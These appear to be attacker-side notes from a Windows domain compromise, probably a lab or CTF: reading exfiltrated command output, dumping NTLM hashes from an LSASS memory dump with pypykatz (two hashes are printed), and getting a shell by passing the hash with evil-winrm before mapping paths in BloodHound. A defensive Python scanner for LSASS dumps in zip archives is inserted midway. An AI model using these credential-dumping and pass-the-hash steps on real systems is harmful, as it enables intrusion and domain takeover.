lsass.zip is the interesting file
➜ commands_output ls
domain_admins.txt domain_users.txt ipconfig.txt route.txt tasklist.txt
domain_groups.txt firewall_rules.txt netstat.txt systeminfo.txt
➜ commands_output cat domain_admins.txt
Group name     Domain Admins
Comment        Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator            Ipwn3dYourCompany
The command completed successfully.
Found how to dump passwords from the lsass.DMP file:
https://en.hackndo.com/remote-lsass-dump-passwords/
pypykatz lsa minidump lsass.DMP
Got 2 NTLM hashes:
svc_backup:9658d1d1dcd9250115e2205d9f48400d
Administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62
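From the defender's side, the exposure here is an LSASS memory dump sitting inside an archive that a low-privileged account could read. The following added example (not part of the original notes) scans a zip for minidumps whose module list contains lsass.exe, so such files can be found and removed from shares. The function names and the constructed sample archive are assumptions for illustration.

```python
import io
import struct
import zipfile

MODULE_LIST_STREAM = 4   # MINIDUMP_STREAM_TYPE: ModuleListStream
MODULE_SIZE = 108        # sizeof(MINIDUMP_MODULE); ModuleNameRva is at offset 20

def minidump_modules(data):
    """Return module paths from a minidump, or None if data is not a minidump."""
    if data[:4] != b"MDMP":
        return None
    names = []
    try:
        n_streams, dir_rva = struct.unpack_from("<II", data, 8)
        for i in range(min(n_streams, 64)):
            stype, _size, rva = struct.unpack_from("<III", data, dir_rva + 12 * i)
            if stype != MODULE_LIST_STREAM:
                continue
            (count,) = struct.unpack_from("<I", data, rva)
            for m in range(min(count, 4096)):
                (name_rva,) = struct.unpack_from("<I", data, rva + 4 + m * MODULE_SIZE + 20)
                (nbytes,) = struct.unpack_from("<I", data, name_rva)  # MINIDUMP_STRING.Length
                names.append(data[name_rva + 4:name_rva + 4 + nbytes].decode("utf-16-le", "replace"))
    except struct.error:
        pass  # truncated or malformed dump: keep whatever was parsed
    return names

def find_lsass_dumps(zip_bytes):
    """List archive members that are minidumps of an lsass.exe process."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        dumps = {n: minidump_modules(zf.read(n)) or [] for n in zf.namelist()}
    return [n for n, mods in dumps.items()
            if any(p.lower().endswith("\\lsass.exe") for p in mods)]

def build_sample_dump(exe_path):
    """Constructed minimal minidump: 32-byte header, one directory entry, one module."""
    name = exe_path.encode("utf-16-le")
    module = bytearray(MODULE_SIZE)
    struct.pack_into("<I", module, 20, 156)  # ModuleNameRva -> string right after the module
    return (struct.pack("<4sIIIIIQ", b"MDMP", 0xA793, 1, 32, 0, 0, 0)
            + struct.pack("<III", MODULE_LIST_STREAM, 4 + MODULE_SIZE, 44)
            + struct.pack("<I", 1) + bytes(module) + struct.pack("<I", len(name)) + name)

def build_sample_zip(members):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for fname, exe in members.items():  # constructed sample input
            zf.writestr(fname, build_sample_dump(exe))
    return buf.getvalue()
```

The check keys on the dump's own module list rather than the file name, so a renamed dump is still flagged.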
Got a shell using the svc_backup hash and evil-winrm
Marked user svc_backup as owned in BloodHound
Shortest path from owned_principals